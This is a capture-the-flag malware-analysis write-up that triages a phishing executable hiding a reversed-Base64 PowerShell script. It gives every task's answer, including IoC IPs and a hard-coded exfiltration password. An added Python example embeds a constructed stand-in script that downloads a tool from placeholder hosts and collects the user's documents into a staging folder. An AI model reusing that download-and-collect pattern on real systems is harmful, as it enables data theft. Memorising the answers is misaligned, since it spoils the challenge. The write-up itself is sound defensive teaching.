Sherlock Scenario
Following a recent report of a data breach at their company, the client submitted a potentially malicious executable file. The file originated from a link within a phishing email received by a victim user. Your objective is to analyze the binary to determine its functionality and possible consequences it may have on their network. By analyzing the functionality and potential consequences of this binary, you can gain valuable insights into the scope of the data breach and identify if it facilitated data exfiltration. Understanding the binary's capabilities will enable you to provide the client with a comprehensive report detailing the attack methodology, potential data at risk, and recommended mitigation steps.
Setting Up the Environment
First download the given file and unzip it. The password for the archive is hacktheblue.
The zip file contains an executable named Superstar_MemberCard.tiff.exe. The double extension is meant to make the file pass as a TIFF image; treat it as live malware and only handle it in an isolated analysis VM.
Task 1
Question
To accurately reference and identify the suspicious binary, please provide its SHA256 hash.
Solution
I used PeStudio to get the SHA256 hash of the given executable. You can download PeStudio from the following link: https://www.winitor.com/download .
Once you have opened the executable in PeStudio via File -> Open, the SHA256 hash is listed under the footprints tab. Record it before doing anything else, since every later finding (and any threat-intel lookup) is keyed on this hash.
Answer: 12DAA34111BB54B3DCBAD42305663E44E7E6C3842F015CCCBBE6564D9DFD3EA3
Task 2
Question
When was the binary file originally created, according to its metadata (UTC)?
Solution
The creation date is shown under the file-header tab of PeStudio. It is the TimeDateStamp from the PE file header, the value the linker wrote when the binary was built; it is stored as seconds since the Unix epoch, so it is already in UTC. Keep in mind that this is attacker-controlled metadata and can be forged, so treat it as a clue rather than proof of when the file was really created.
Make sure that you enter the answer in the following format: YYYY-MM-DD HH:MM:SS.
Answer: 2024-03-13 10:38:06
Task 3
Question
Examining the code size in a binary file can give indications about its functionality. Could you specify the byte size of the code in this binary?
Solution
In a PE file the executable code normally lives in the .text section. The details of the .text section are listed under the sections tab of PeStudio; the value asked for is its raw (on-disk) size. 38400 is 0x9600, a multiple of the usual 0x200 file alignment, which is how you can tell it is the raw size rather than the virtual size.
Answer: 38400
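The three values read off PeStudio in Tasks 1 to 3 (file hash, PE header timestamp, raw size of .text) can also be pulled from the file directly by walking the PE/COFF headers. The script below is an added example for this write-up, not PeStudio's code and not the Sherlock's binary; it uses only the Python standard library, and build_sample_pe() constructs a minimal PE-shaped byte string (headers only) so the parser can be exercised offline without the malware sample.

```python
"""Static PE triage with the standard library only (added example).

Reproduces the values PeStudio shows: SHA256 (footprints tab), the
TimeDateStamp of the file header (file-header tab) and the raw size of
.text (sections tab).  build_sample_pe() is a constructed stand-in so
the code runs without the real sample.
"""
import hashlib
import struct
import sys
from datetime import datetime, timezone

# IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
# PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
COFF_HEADER_FMT = "<HHIIIHH"
# IMAGE_SECTION_HEADER (40 bytes): Name, VirtualSize, VirtualAddress,
# SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
# NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER_FMT = "<8sIIIIIIHHI"
SECTION_HEADER_SIZE = struct.calcsize(SECTION_HEADER_FMT)


def sha256_hex(data):
    """SHA256 of the whole file, upper-case like PeStudio's footprints tab."""
    return hashlib.sha256(data).hexdigest().upper()


def parse_pe(data):
    """Return the COFF timestamp and the section table of a PE image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ (DOS) header")
    # e_lfanew at offset 0x3C holds the file offset of the "PE\0\0" signature.
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    (machine, n_sections, timestamp, _, _,
     opt_size, characteristics) = struct.unpack_from(COFF_HEADER_FMT, data, pe_off + 4)
    # The section table starts right after the optional header.
    sect_off = pe_off + 4 + struct.calcsize(COFF_HEADER_FMT) + opt_size
    sections = []
    for i in range(n_sections):
        (name, vsize, vaddr, raw_size, raw_ptr,
         _, _, _, _, flags) = struct.unpack_from(
            SECTION_HEADER_FMT, data, sect_off + i * SECTION_HEADER_SIZE)
        sections.append({
            "name": name.rstrip(b"\0").decode("ascii", "replace"),
            "virtual_size": vsize,
            "virtual_address": vaddr,
            "raw_size": raw_size,      # SizeOfRawData: bytes present on disk
            "raw_offset": raw_ptr,
            "characteristics": flags,
        })
    return {
        "machine": machine,
        "timestamp": timestamp,
        # TimeDateStamp is seconds since the Unix epoch, hence already UTC.
        "compiled_utc": datetime.fromtimestamp(timestamp, timezone.utc)
                                .strftime("%Y-%m-%d %H:%M:%S"),
        "characteristics": characteristics,
        "sections": sections,
    }


def code_size(info):
    """Raw size of the .text section, the value asked for in Task 3."""
    for s in info["sections"]:
        if s["name"] == ".text":
            return s["raw_size"]
    raise KeyError("no .text section")


def build_sample_pe(timestamp, text_raw_size):
    """Constructed minimal PE-shaped bytes (headers only, not a runnable image).

    Exists so the parser can be exercised offline; it is not the Sherlock sample.
    """
    pe_off = 0x80
    dos = bytearray(pe_off)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, pe_off)
    opt_size = 0xE0  # size of a PE32 optional header; left zeroed in this stand-in
    coff = struct.pack(COFF_HEADER_FMT, 0x14C, 1, timestamp, 0, 0, opt_size, 0x0102)
    text = struct.pack(SECTION_HEADER_FMT, b".text", text_raw_size, 0x1000,
                       text_raw_size, 0x400, 0, 0, 0, 0, 0x60000020)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + text


if __name__ == "__main__":
    # Pass a path to triage a real file; otherwise the constructed stand-in is used.
    path = sys.argv[1] if len(sys.argv) > 1 else None
    blob = open(path, "rb").read() if path else build_sample_pe(1710326286, 38400)
    info = parse_pe(blob)
    print("SHA256      :", sha256_hex(blob))
    print("compiled UTC:", info["compiled_utc"])
    print(".text raw   :", code_size(info))
```

Run it as `python pe_triage.py Superstar_MemberCard.tiff.exe` inside the analysis VM to get the same three values PeStudio shows; the stand-in is built with the timestamp and .text size from this write-up so the output format can be checked against the answers above.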
Task 4
Question
It appears that the binary may have undergone a file conversion process. Could you determine its original filename?
Solution
The original file name is shown under the resources tab of PeStudio: the script was embedded in the binary as a resource that still carries its original name. A .ps1 stored as a resource inside an .exe tells you the binary is a wrapper that unpacks and runs a PowerShell script, which is what the remaining tasks analyse.
Answer: newILY.ps1
Task 5
Question
Specify the hexadecimal offset where the obfuscated code of the identified original file begins in the binary.
Solution
To identify the hexadecimal offset of the obfuscated code I used HxD in my case. You can download HxD from the following link: https://mh-nexus.de/en/hxd/ .
You can also get the hexadecimal offset of the obfuscated code from the location column of the newILY.ps1 entry under the resources tab of PeStudio.
In HxD, set the number of bytes per row to 4 as shown in the above image to get the exact offset: 0x2C74 is not a multiple of 16, so with the default 16-byte rows the resource starts in the middle of a row, whereas with 4-byte rows it lands at the start of a row and the address column reads it off directly.
Answer: 2C74
Task 6
Question
The threat actor concealed the plaintext script within the binary. Can you provide the encoding method used for this obfuscation?
Solution
I used FLOSS to extract all the strings in the given executable. You can download FLOSS from the following link: https://github.com/mandiant/flare-floss/releases/tag/v3.1.0 .
In the output of FLOSS you can find the obfuscated code as shown in the following image. The giveaway is a long string drawn only from the Base64 alphabet that does not decode as-is; if such a string starts with one or two = characters, the padding has been moved to the front, which means the encoded string was reversed.
The code is obfuscated with Base64 encoding and the encoded string was then reversed. I used CyberChef to reverse the code and decode the Base64 to get the actual script. The order of operations matters: reverse first, then From Base64, because the reversal was the last step applied.
You can use the following link to see the output in the above image in realtime.
https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=&oeol=CRLF
Answer: Base64
Task 7
Question
What is the specific cmdlet utilized that was used to initiate file downloads?
Solution
You can find the cmdlet used in the decoded version of the obfuscated code as shown in the following image. When reviewing the script, also check for the aliases (iwr, curl, wget) and for Invoke-RestMethod or Start-BitsTransfer, which achieve the same thing and are easy to miss when searching for the full cmdlet name.
Answer: Invoke-WebRequest
Task 8
Question
Could you identify any possible network-related Indicators of Compromise (IoCs) after examining the code? Separate IPs by comma and in ascending order.
Solution
You can extract the IP addresses and sort them with CyberChef as shown in the following image by appending the Extract IP addresses operation to the same recipe; the last two arguments in the recipe below enable sorting and de-duplication. Check the order by octet value rather than as text, since a plain string sort puts 10 before 9.
You can use the following link to see the output in the above image in realtime.
https://gchq.github.io/CyberChef/#recipe=Reverse('Character')From_Base64('A-Za-z0-9%2B/%3D',true,false)Extract_IP_addresses(true,false,false,false,true,true)&input=&oeol=CRLF
Answer: 35.169.66.138,44.206.187.144
Task 9
Question
The binary created a staging directory. Can you specify the location of this directory where the harvested files are stored?
Solution
You can find the directory in the deobfuscated code as shown in the following image. C:\Users\Public is writable by every local user, so staging there needs no elevation, which is why it is a common choice; check the victim host for this folder and whatever was collected into it.
Answer: C:\Users\Public\Public Files
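Tasks 6 to 9 (undo the reverse-then-Base64 wrapping, find the download cmdlet, list the network IoCs in ascending order, find the staging directory) can be reproduced with one script instead of a CyberChef recipe. The code below is an added example for this write-up, not the client's binary and not the real newILY.ps1: SAMPLE_SCRIPT is a constructed stand-in that mirrors the features described above (Invoke-WebRequest downloads into a staging directory, followed by file collection), wrapped the same way, Base64 first and then reversed. The staging path is the one reported in Task 9; the remote addresses are RFC 5737 documentation ranges chosen so the two addresses sort differently as text and as IP addresses, not the IoCs from the case.

```python
"""Recover a reversed, Base64-encoded PowerShell script and pull IoCs.

Added example for this write-up.  SAMPLE_SCRIPT is a constructed
stand-in, not the script embedded in the Sherlock binary.
"""
import base64
import ipaddress
import re

# Constructed sample payload (not the malware's script).
SAMPLE_SCRIPT = r'''$stage = "C:\Users\Public\Public Files"
New-Item -ItemType Directory -Force -Path $stage | Out-Null
Invoke-WebRequest -Uri "http://192.0.2.10/tool.exe" -OutFile "$stage\tool.exe"
Invoke-WebRequest -Uri "http://192.0.2.9/list.txt" -OutFile "$stage\list.txt"
Get-ChildItem -Recurse $env:USERPROFILE -Include *.docx | Copy-Item -Destination $stage
'''


def obfuscate(script, encoding="utf-8"):
    """Base64-encode, then reverse: the wrapping the write-up describes."""
    return base64.b64encode(script.encode(encoding)).decode("ascii")[::-1]


SAMPLE_BLOB = obfuscate(SAMPLE_SCRIPT)


def deobfuscate(blob):
    """Undo the wrapping: reverse first, then Base64-decode.

    Order matters because the reversal was applied last.  Whitespace is
    dropped first because string dumps often wrap long lines.
    """
    raw = base64.b64decode("".join(blob.split())[::-1], validate=True)
    # PowerShell -EncodedCommand payloads are UTF-16LE, where every second
    # byte of ASCII text is NUL.  Fall back to that when the NUL density says so.
    if raw and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", "replace")
    return raw.decode("utf-8", "replace")


IPV4_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")
DOWNLOAD_RE = re.compile(
    r"\b(Invoke-WebRequest|iwr|Invoke-RestMethod|Start-BitsTransfer|"
    r"DownloadFile|DownloadString|curl|wget)\b", re.IGNORECASE)
WINPATH_RE = re.compile(r"""[A-Za-z]:\\[^"'\r\n$|]+""")


def extract_ips(script):
    """Unique IPv4 literals, sorted by address value rather than as strings."""
    found = set()
    for candidate in IPV4_RE.findall(script):
        try:
            found.add(ipaddress.IPv4Address(candidate))
        except ipaddress.AddressValueError:
            pass  # 999.1.2.3 or a version number, not an address
    return [str(ip) for ip in sorted(found)]


def extract_download_cmdlets(script):
    """Download cmdlets and their common aliases found in the script."""
    return sorted({m.group(1) for m in DOWNLOAD_RE.finditer(script)}, key=str.lower)


def extract_paths(script):
    """Quoted Windows paths in order of first appearance (candidate staging dirs)."""
    seen = []
    for path in WINPATH_RE.findall(script):
        path = path.rstrip()
        if path not in seen:
            seen.append(path)
    return seen


if __name__ == "__main__":
    script = deobfuscate(SAMPLE_BLOB)
    print(script)
    print("download cmdlets:", ", ".join(extract_download_cmdlets(script)))
    print("network IoCs    :", ",".join(extract_ips(script)))  # Task 8 answer format
    print("paths           :", extract_paths(script))
```

To use it on the real sample, paste the long Base64 string from the FLOSS output into deobfuscate() instead of SAMPLE_BLOB. The ipaddress-based sort is the point of the IoC helper: with the stand-in's addresses a string sort returns 192.0.2.10 before 192.0.2.9, which is not the ascending order the question asks for.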
Task 10
Question
What MITRE ID corresponds to the technique used by the malicious binary to autonomously gather data?
Solution
The malicious binary uses the MITRE ATT&CK technique T1119, Automated Collection: the script gathers files of interest from the host on its own and copies them into the staging directory without further operator interaction. You can find more details about this technique at https://attack.mitre.org/techniques/T1119/ .
Answer: T1119
Task 11
Question
What is the password utilized to exfiltrate the collected files through the file transfer program within the binary?
Solution
You can find the password in the deobfuscated code as shown in the following image: the script invokes the file transfer program with the credentials hard-coded on its command line. Hard-coded exfiltration credentials are a useful indicator in their own right; search for them in process-creation telemetry with command-line auditing enabled and in proxy logs to confirm whether the transfer actually ran on the victim host.
Answer: M8&C!i6KkmGL1-#